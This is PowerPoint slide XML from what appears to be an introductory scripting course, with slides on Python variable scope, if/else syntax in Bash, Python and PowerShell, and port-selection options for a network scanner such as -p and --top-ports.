            <a:off x="7100411" y="4430992"/>
            <a:ext cx="4366638" cy="1577689"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="23" name="Picture 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D7F19E3D-D0EB-473F-98F4-E82CC7194D64}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7100411" y="744303"/>
            <a:ext cx="4366638" cy="1612620"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="TextBox 23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D33B3B70-7CFA-4C37-A7A4-C029BFBCE2A2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10320581" y="4399283"/>
            <a:ext cx="11464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Arial" panose="020B0604020202020204"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>PYTHON</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="TextBox 24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AD02B075-3BA4-4DDA-9A00-6B5620EC0931}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10601342" y="775434"/>
            <a:ext cx="8386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Arial" panose="020B0604020202020204"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>BASH</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="334931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FBB4673-B169-4059-BA3A-8EB3876EF7AE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="414339" y="2674303"/>
            <a:ext cx="7567316" cy="3657917"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Slide Number Placeholder 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0B511C53-95CD-49AF-B98B-E81D1583BE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92A8ABD-1897-4051-80A9-C44C0C08FF2A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Scope Example - Python</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5B7E79F0-B0AA-4E84-A3EF-20B1FC18E570}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="414339" y="1295400"/>
            <a:ext cx="8556942" cy="4876800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Where a variable is declared affects how it can be used</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Global: Outside of a function</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Local: Inside a function</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CA957F97-9505-4269-8595-35062390B108}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5755339" y="3733800"/>
            <a:ext cx="6236416" cy="1404300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="11" name="Straight Connector 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{10D3F7DC-9860-4E01-BA48-7DF857B1D11D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2367280" y="3429000"/>
            <a:ext cx="3302000" cy="9804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1CC603-A3C0-45CB-9FE3-8EDE55F945EE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2367280" y="4064000"/>
            <a:ext cx="3302000" cy="62992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CC207C-0C87-4FEC-918A-C56F4CBD0537}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2367280" y="4785360"/>
            <a:ext cx="3302000" cy="193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21ACBB-530F-4A13-890C-98A7F31954D2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2133600" y="2854960"/>
            <a:ext cx="3535680" cy="127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9310FB46-55B2-45B4-BE95-5B83CB66EDC9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="629920" y="5466080"/>
            <a:ext cx="152400" cy="762000"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 132080 w 152400"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 762000"/>
              <a:gd name="connsiteX1" fmla="*/ 132080 w 152400"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 762000"/>
              <a:gd name="connsiteX2" fmla="*/ 0 w 152400"/>
              <a:gd name="connsiteY2" fmla="*/ 0 h 762000"/>
              <a:gd name="connsiteX3" fmla="*/ 0 w 152400"/>
              <a:gd name="connsiteY3" fmla="*/ 762000 h 762000"/>
              <a:gd name="connsiteX4" fmla="*/ 152400 w 152400"/>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762000">
                <a:moveTo>
                  <a:pt x="132080" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="132080" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="762000"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="152400" y="7620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13" name="Straight Connector 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{896370FD-0EE2-43F9-92F6-764037F20A33}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="1624614" y="4978400"/>
            <a:ext cx="4044666" cy="12496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233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437C9D-A4F7-4F32-8624-B4BE30C879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A669423-5F69-4698-A277-3D3C73DEF7DA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Conditionals (If / Else)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FBD2D82E-61C9-4104-B0DD-95C2A9BBAADE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="414338" y="1051072"/>
            <a:ext cx="11363325" cy="2133600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If/Else largely relies on Boolean types (0 or 1)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Comparisons vary by language</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Ex: most languages use &gt;, PowerShell uses -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>gt</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>Do not</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> use ‘=‘ for comparisons, use ‘==‘</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" i="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="8" name="Group 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7FDE0444-C450-4D00-9B2F-D4FD53269E81}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7626334" y="3028067"/>
            <a:ext cx="4326309" cy="2998455"/>
            <a:chOff x="192425" y="2959345"/>
            <a:chExt cx="4326309" cy="2998455"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="9" name="Picture 8">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E422DA01-795F-4457-8F69-F5A9D31FCDDB}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId2"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="192425" y="2959345"/>
              <a:ext cx="4326309" cy="2998455"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="12" name="TextBox 11">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5D6E9355-A81B-488D-8682-F17AFA05E142}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3535503" y="3037318"/>
              <a:ext cx="8386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Arial" panose="020B0604020202020204"/>
                  <a:ea typeface="+mn-ea"/>
                  <a:cs typeface="+mn-cs"/>
                </a:rPr>
                <a:t>BASH</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="7" name="Group 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A60802E0-7C26-48AD-8324-4500BD454D76}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="267588" y="3028067"/>
            <a:ext cx="4635206" cy="2602221"/>
            <a:chOff x="7485018" y="2959345"/>
            <a:chExt cx="4635206" cy="2602221"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="11" name="Picture 10">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{59D6CB34-C990-459E-845C-5473821E4C48}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId3"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="7485018" y="2959345"/>
              <a:ext cx="4635206" cy="2602221"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="13" name="TextBox 12">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CD368B85-C4E0-41F6-9E2F-AEE07C74A17C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10912162" y="3028067"/>
              <a:ext cx="11464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Arial" panose="020B0604020202020204"/>
                  <a:ea typeface="+mn-ea"/>
                  <a:cs typeface="+mn-cs"/>
                </a:rPr>
                <a:t>PYTHON</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0D559D53-8A69-4838-B5A3-F976BED56594}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8186677" y="1398180"/>
            <a:ext cx="3678476"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6E6E6"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Bash: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if [[ test ]]; then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fi</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="TextBox 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BCA1AC13-074F-47F5-98DA-A378BD6EDF42}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4978722" y="3867269"/>
            <a:ext cx="2087777"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6E6E6"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>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if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5463721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45A3F-202A-45BF-BAEA-B697C3E9B9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C3EB5EF-30AC-4227-912A-D2A6F062CD77}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Conditionals - PowerShell</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Text Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AB6A1656-AA74-43E0-9FFE-73DC8E5654F3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="233680" y="2438400"/>
            <a:ext cx="5356542" cy="3180080"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Uses -&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>comparison&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> instead of signs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>-match </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>or -like for strings</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Spell out ‘else’ in ‘elseif’</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7B65578E-9FBF-4E70-8E0C-F2353E6E62FA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5427414" y="1432387"/>
            <a:ext cx="6530906" cy="3993226"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2819F1C6-8706-43EC-9660-80CF4D353BFA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1013043" y="4243474"/>
            <a:ext cx="326368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E6E6E6"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Syntax: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if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33081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(2/6)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4338" y="2902184"/>
            <a:ext cx="11363325" cy="3270016"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Ports</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Specified with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>–p[list|-]</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>--top-ports=#</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Default if not specified: top 1000 ports</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>--top-ports=# </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>or</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> -p &lt;list&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, it will show all requested ports</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>-p-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, it will only show open ports</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2F8D59EF-1BC5-4CC1-858E-E55095B2C44D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2"/>
          <a:srcRect b="91739"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="434050" y="1305332"/>
            <a:ext cx="10747046" cy="566530"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8C5B1146-7D4C-4882-B55B-33C95F703249}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1037122" y="1909711"/>
            <a:ext cx="11060068" cy="676369"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Rectangle 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AB51709B-73E0-425B-9467-6E210E5B02F3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5655365" y="1305332"/>
            <a:ext cx="1620078" cy="2054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6008F31-5B40-4A64-A22D-6163BCD555A1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8193156" y="1909711"/>
